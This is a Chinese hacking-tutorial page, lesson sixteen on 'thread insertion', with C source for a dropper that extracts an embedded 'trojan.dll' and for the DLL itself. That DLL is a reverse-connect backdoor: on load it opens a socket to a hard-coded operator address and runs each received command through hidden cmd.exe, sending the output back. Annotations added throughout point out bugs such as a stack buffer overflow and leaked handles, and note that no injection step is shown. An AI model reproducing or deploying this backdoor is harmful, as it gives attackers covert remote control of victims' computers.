
黑客编程课程(十六)线程插入技术

2012-11-23 
黑客编程教程(十六)线程插入技术第十六节 线程插入技术头文件://resource.h#define RC_BINARYTYPE 256#def

黑客编程教程(十六)线程插入技术

// Section 16: "thread insertion" (DLL injection) -- tutorial listing.
// NOTE(review): what follows is a reverse-connect backdoor: the DLL at the
// bottom connects out to a hard-coded address and runs whatever it receives
// through `cmd.exe /c`. The page shows only a dropper and the payload DLL;
// no injection step (CreateRemoteThread or similar) appears in this listing.
//
// File 1: resource.h -- shared by the dropper and its resource script.
#define RC_BINARYTYPE 256     // user-defined resource type under which the DLL image is stored
#define ID_MAGICDEL_DLL 100   // resource id of the embedded DLL image

// File 2: the dropper executable.
// NOTE(review): the original page labels this part "DLL file" and the next
// part "main program"; the two labels are swapped. This file has main() and
// extracts the embedded DLL to disk; the next file is the DLL (DllMain).
#include <windows.h>
#include<stdio.h>
#include "resource.h"

// Write the resource ID_MAGICDEL_DLL / RC_BINARYTYPE embedded in this
// executable to `filename` (a relative path, i.e. into the current working
// directory), overwriting any existing file (CREATE_ALWAYS).
// NOTE(review): no return value and no error handling -- the results of
// FindResource, LoadResource, LockResource and CreateFile are used unchecked
// (a missing resource ends in a NULL/INVALID_HANDLE_VALUE use), and a short
// WriteFile goes unnoticed because cbWritten is never compared with cbRes.
void WriteResourceToFile(char const *filename)
{
    HINSTANCE hInstance=GetModuleHandle(NULL);   // module that carries the resource: this .exe
    HRSRC hResInfo = FindResource(hInstance, MAKEINTRESOURCE(ID_MAGICDEL_DLL),
                                  MAKEINTRESOURCE(RC_BINARYTYPE));
    HGLOBAL hgRes = LoadResource(hInstance, hResInfo);
    void *pvRes = LockResource(hgRes);
    DWORD cbRes = SizeofResource(hInstance, hResInfo);
    HANDLE hFile = CreateFile(filename, GENERIC_WRITE, 0, 0, CREATE_ALWAYS,
                              FILE_ATTRIBUTE_NORMAL, 0);
    DWORD cbWritten;
    WriteFile(hFile, pvRes, cbRes, &cbWritten, 0);
    CloseHandle(hFile);
}

// Dropper entry point: extracts the embedded DLL as "trojan.dll" in the
// current directory. Nothing here loads or injects it.
int main(void)
{
    WriteResourceToFile("trojan.dll");
    return 0;
}

// File 3: the payload DLL (labelled "main program" on the original page).
#include<winsock2.h>
#include<stdio.h>
#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib, "kernel32.lib")

int StartSocket();   // reverse-connect command loop, run on its own thread

// DLL entry point (the DLL's counterpart of main()). On DLL_PROCESS_ATTACH it
// starts StartSocket on a new thread and returns at once, so the network and
// command loop runs inside whatever process loaded this DLL.
// NOTE(review): StartSocket is declared `int StartSocket()`, not
// `DWORD WINAPI fn(LPVOID)`; the cast to LPTHREAD_START_ROUTINE hides a
// signature/calling-convention mismatch (undefined behaviour, and on 32-bit
// x86 a stdcall/cdecl mismatch). The thread handle CreateThread returns is
// never closed, so it leaks until the host process exits.
BOOL APIENTRY DllMain( HANDLE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved)
{
    switch(ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        {
            DWORD id;
            CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)StartSocket,NULL,0,&id);
            break;
        }
    default:  break;
    }
    return TRUE;
}

// Reverse-connect shell. Connects to the hard-coded operator address
// (127.0.0.1:80 in this listing, evidently a placeholder), sends a banner,
// then loops forever: receive one command, run it as
// "<system dir>\cmd.exe /c <command>" with stdout/stderr redirected into an
// anonymous pipe, and stream the pipe contents back over the socket.
// The `return 0` after the loop is unreachable; on any setup failure the
// function does a bare `return;` in an int function (a C99 constraint
// violation -- the thread's exit code is garbage, harmless here but not
// portable).
int StartSocket()
{
    char *messages = "\r\n======================== BackConnect BackDoor V0.1 ========================\r\n========= Welcome to Http://www.hackerxfiles.net =========\r\n";
    WSADATA WSAData;
    SOCKET sock;
    SOCKADDR_IN addr_in;
    char buf1[1024];          // socket receive buffer (one command per recv)
    memset(buf1,0,1024);      // zeroed ONCE here only -- see the stale-data note at strncat below
    // NOTE(review): every printf below has a typo'd format -- "Error:d"
    // should be "Error:%d" -- so the WSAGetLastError() value is never printed
    // and is a spurious extra argument. Inside a DLL loaded by a windowless
    // host there is usually no console for this output anyway.
    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:d\n",WSAGetLastError());
        return;
    }
    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(80);                           // remote (operator) port
    addr_in.sin_addr.S_un.S_addr=inet_addr("127.0.0.1");  // remote (operator) IP
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:d\n",WSAGetLastError());
        return;
    }
    // Connect out to the operator: a single attempt, no retry or back-off.
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:d",WSAGetLastError());
        return;
    }
    // Send the welcome banner.
    if (send(sock,messages,strlen(messages),0)==SOCKET_ERROR)
    {
        printf("Send failed.Error:d\n",WSAGetLastError());
        return;
    }
    char buffer[2048] = {0};  // output captured from the child's pipe
    // Command loop. cmdline is declared in the for-init (C99) and is cleared
    // by the increment clause at the end of every iteration, including after
    // each `continue`.
    // NOTE(review): cmdline is 270 bytes, but up to 1024 bytes received from
    // the socket are appended to it (see strncat below) -- a stack buffer
    // overflow driven by the peer.
    for(char cmdline[270];;memset(cmdline,0,sizeof(cmdline)))
    {
        // Anonymous pipe for the child's output; the handles are created
        // inheritable so cmd.exe can write into hWrite.
        SECURITY_ATTRIBUTES sa;
        HANDLE hRead,hWrite;
        sa.nLength = sizeof(SECURITY_ATTRIBUTES);
        sa.lpSecurityDescriptor = NULL;
        sa.bInheritHandle = TRUE;
        if (!CreatePipe(&hRead,&hWrite,&sa,0)) {  printf("Error On CreatePipe()");     return;}
        STARTUPINFO si;
        PROCESS_INFORMATION pi;
        si.cb = sizeof(STARTUPINFO);
        GetStartupInfo(&si);                 // start from this process's own startup info
        si.hStdError = hWrite;               // child's stderr -> pipe
        si.hStdOutput = hWrite;              // child's stdout -> pipe (stdin is left as inherited)
        si.wShowWindow = SW_HIDE;            // no visible console window for cmd.exe
        si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
        // Build "<system dir>\cmd.exe /c". MAX_PATH+1 == 261 <= sizeof cmdline,
        // so this first part is bounded; the command appended below is not.
        GetSystemDirectory(cmdline,MAX_PATH+1);
        strcat(cmdline,"\\cmd.exe /c");
        // Block until the next command arrives.
        // NOTE(review): recv() reports a graceful close with 0, not
        // SOCKET_ERROR, so a disconnected peer falls into the `len<=1`
        // branch and the loop spins forever, creating (and leaking) a pipe
        // per iteration, instead of exiting as the original comment intended.
        int   len=recv(sock,buf1,1024,NULL);
        if(len==SOCKET_ERROR)exit(0);    // on a socket error, terminate the WHOLE host process (exit() from a DLL thread)
        if(len<=1){send(sock,"error\n",sizeof("error\n"),0);continue;}   // sizeof includes the trailing NUL byte
        // Append the received command to the cmd.exe command line.
        // NOTE(review): strncat(dst, src, strlen(src)) is just strcat -- there
        // is no bound against sizeof cmdline (overflow, see above). buf1 is
        // never re-zeroed and recv() does not NUL-terminate, so a shorter
        // command following a longer one is run together with the old tail
        // (e.g. "dir\n" after "ipconfig /all\n" becomes "dir\nonfig /all\n"),
        // and a full 1024-byte receive leaves no terminator at all, so strlen
        // reads past buf1.
        strncat(cmdline,buf1,strlen(buf1));
        // Spawn cmd.exe with handle inheritance enabled so it picks up hWrite.
        // NOTE(review): on failure hRead and hWrite are leaked.
        if (!CreateProcess(NULL,cmdline,NULL,NULL,TRUE,NULL,NULL,NULL,&si,&pi)) { send(sock,"Error command\n",sizeof("Error command\n"),0); continue;}
        // Drop our copy of the write end so ReadFile sees end-of-pipe once the
        // child exits and its inherited copy is closed.
        CloseHandle(hWrite);
        // Relay the child's output until the pipe is drained / broken.
        // NOTE(review): send() uses strlen(buffer) rather than bytesRead, so
        // output is cut at the first embedded NUL and a full 2048-byte read
        // has no terminator. hRead, pi.hProcess and pi.hThread are never
        // closed -- three handles leaked per command.
        for(DWORD bytesRead;ReadFile(hRead,buffer,2048,&bytesRead,NULL);memset(buffer,0,2048))
        {  send(sock,buffer,strlen(buffer),0);}
    }
    return 0;
}
